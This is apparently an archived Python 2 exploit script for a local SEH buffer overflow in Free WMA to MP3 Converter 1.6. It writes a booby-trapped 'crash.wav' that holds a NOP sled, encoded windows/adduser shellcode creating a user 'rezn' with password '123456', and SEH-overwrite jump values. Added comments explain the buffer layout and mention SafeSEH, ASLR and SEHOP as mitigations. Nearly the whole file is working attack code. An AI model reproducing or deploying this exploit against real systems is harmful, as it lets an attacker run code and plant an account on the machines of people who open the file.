#!/usr/bin/python -w
# In the name of allah
# Title : Local buffer overflow - SEH
# Infected program: [Free WMA to MP3 converter 1.6]
# Date: 30/11/2012
# Exploit Author: [R3ZN0V]
# Software : [www.eusing.com]
# Download Link: [http://www.eusing.com/free_wma_converter/mp3_wma_converter.htm]
# OS's: [Windows xp sp3 , Windows 7 64bit sp1 and 32bit]
# References : http://www.exploit-db.com/exploits/15499/
#=====================================================================================#
# First , i'd like to thank b33f for all his cooperation (always the best man ;) ) . #
# I suffered so much until I made this a working exploit, as well as a few problems with #
# badchars analyzing and executing my shellcode , which is inside the memory after #
# tracing badchars , if you looked deeply at the path you'll see a weird thing #
# is a two byte of 0D will be added automatically like this : #
# 09 (0D) 0A 0B 0C (0D) , I've no idea what caused that; the first 0D is the problem #
# Probably like null-byte , however , go to metasploit and figure this out by badchars#
# analyzing , and try replacing the shell with another one using this command : #
# msfencode -b '\x00\x0a' , obviously it won't work . #
# #
# Another thing to mention very important , is the program doesn't allow shellcode #
# more than 300b , try to feed the program shellcode more than 300b and see for yourself. #
# And the badchars are \x0d\x0a . #
#=====================================================================================#
# Output path, relative to the current working directory. NOTE: the name
# shadows the Python 2 builtin `file`; harmless here but worth knowing.
file = "crash.wav"
# windows/adduser EXITFUN=seh PASS=123456 USER=rezn R | msfencode -e x86/shikata_ga_nai -b '\x0a\x0d' -t c <========= 298 byte iteration=1 =========>
# Encoded payload. Per the command line above it is a windows/adduser
# payload run through shikata_ga_nai with \x0a and \x0d excluded (the bad
# characters recorded in the header). 19 lines of 15 bytes + 13 = 298 bytes,
# which matches the "298 byte" figure in the note and stays under the
# 300-byte limit the author observed for this program.
shell = ("\xda\xc1\xd9\x74\x24\xf4\xba\xd8\x8f\x4f\xc9\x5e\x2b\xc9\xb1"
"\x44\x83\xee\xfc\x31\x56\x16\x03\x56\x16\xe2\x2d\x73\xa7\x40"
"\xcd\x8c\x38\x33\x44\x69\x09\x61\x32\xf9\x38\xb5\x31\xaf\xb0"
"\x3e\x17\x44\x42\x32\xbf\x6b\xe3\xf9\x99\x42\xf4\xcf\x25\x08"
"\x36\x51\xd9\x53\x6b\xb1\xe0\x9b\x7e\xb0\x25\xc1\x71\xe0\xfe"
"\x8d\x20\x15\x8b\xd0\xf8\x14\x5b\x5f\x40\x6f\xde\xa0\x35\xc5"
"\xe1\xf0\xe6\x52\xa9\xe8\x8d\x3d\x09\x08\x41\x5e\x75\x43\xee"
"\x95\x0e\x52\x26\xe4\xef\x64\x06\xab\xce\x48\x8b\xb5\x17\x6e"
"\x74\xc0\x63\x8c\x09\xd3\xb0\xee\xd5\x56\x24\x48\x9d\xc1\x8c"
"\x68\x72\x97\x47\x66\x3f\xd3\x0f\x6b\xbe\x30\x24\x97\x4b\xb7"
"\xea\x11\x0f\x9c\x2e\x79\xcb\xbd\x77\x27\xba\xc2\x67\x8f\x63"
"\x67\xec\x22\x77\x11\xaf\x28\x86\x93\xca\x14\x88\xab\xd4\x36"
"\xe1\x9a\x5f\xd9\x76\x23\x8a\x9d\x87\xd2\x06\x08\x1f\x4d\xf3"
"\x71\x7d\x6e\x2e\xb5\x78\xed\xda\x46\x7f\xed\xaf\x43\x3b\xa9"
"\x5c\x3e\x54\x5c\x62\xed\x55\x75\x01\x7c\xce\x58\xa0\x06\x6b"
"\x85\x05\x94\x53\xab\x3c\x2e\xb4\x46\xcd\xab\xc6\x88\x43\x51"
"\x5d\xa7\x83\xa8\x93\x04\xf7\xff\xe5\x4a\xd8\xbe\x4d\xcf\x06"
"\x67\x68\xef\x28\x02\x00\xcf\xd8\xa3\x8b\x6e\x4c\x5b\x3e\x1e"
"\xf9\xd3\x9e\xa1\x65\x79\xb6\x4f\x0c\xf2\x3c\xe2\xaf\x80\xd3"
"\x70\x5c\x49\x5e\x10\xd8\xe7\xbe\xf5\x5d\xbc\xfa\x09")
# 30-byte NOP sled in front of the payload: 30 + 298 = 328 bytes, placed at
# offset 0 of the output buffer.
evil = "\x90" * 30 + shell
# Overwrite of the next-SEH pointer: a 2-byte short jump (+6) plus two NOPs.
# Per the author's note it hops over the 4-byte handler address below and
# lands on junk3, the long jump.
junk1 = "\xEB\x06\x90\x90" # jmp 6 byte to far jmp
# Overwrite of the SEH handler pointer with a pop/pop/ret address inside
# Wmpcon.exe. Mitigation note: this only works because the author found the
# module without rebasing, ASLR or SafeSEH (the "Rebase=false, aslr=false,
# seh=unsafe" flags recorded below); building with /SAFESEH and /DYNAMICBASE,
# or enabling SEHOP on the host, removes this reusable handler address.
junk2 = "\x56\x23\x40\x00" # pop pop retn Wmpcon.exe Rebase=false , aslr=false , seh=unsafe os=false
# 5-byte near jump, rel32 = 0xFFFFEFDF = -4129. junk3 starts at buffer offset
# 4116 + 4 + 4 = 4124, so the next instruction is at 4129 and the jump lands
# at offset 0, i.e. the start of the NOP sled in `evil`.
junk3 = "\xE9\xDF\xEF\xFF\xFF" # jmp back 4129 byte to the beginning of our buffer
# Trailing filler after the SEH record.
junk4 = "C"*50
# Layout: [evil][0x41 padding up to 4116][nSEH][SEH][long jmp][filler]; total
# 4116 + 4 + 4 + 5 + 50 = 4179 bytes. NOTE: the padding relies on
# len(evil) <= 4116 — a negative multiplier yields "" and would shift the
# SEH fields off their intended offsets. `buffer` shadows a Python 2 builtin.
buffer = evil + "\x41"*(4116-len(evil)) + junk1 + junk2 + junk3 + junk4
# Write the crafted file. Python 2-era open/write/close with no context
# manager and no error handling; an unwritable path raises IOError here.
text = open(file, "w")
text.write(buffer)
text.close()
# Python 2 print statement: this script does not run under Python 3 as-is.
print "\t\n The file has been created :) "
# 0day.today [2018-01-08] #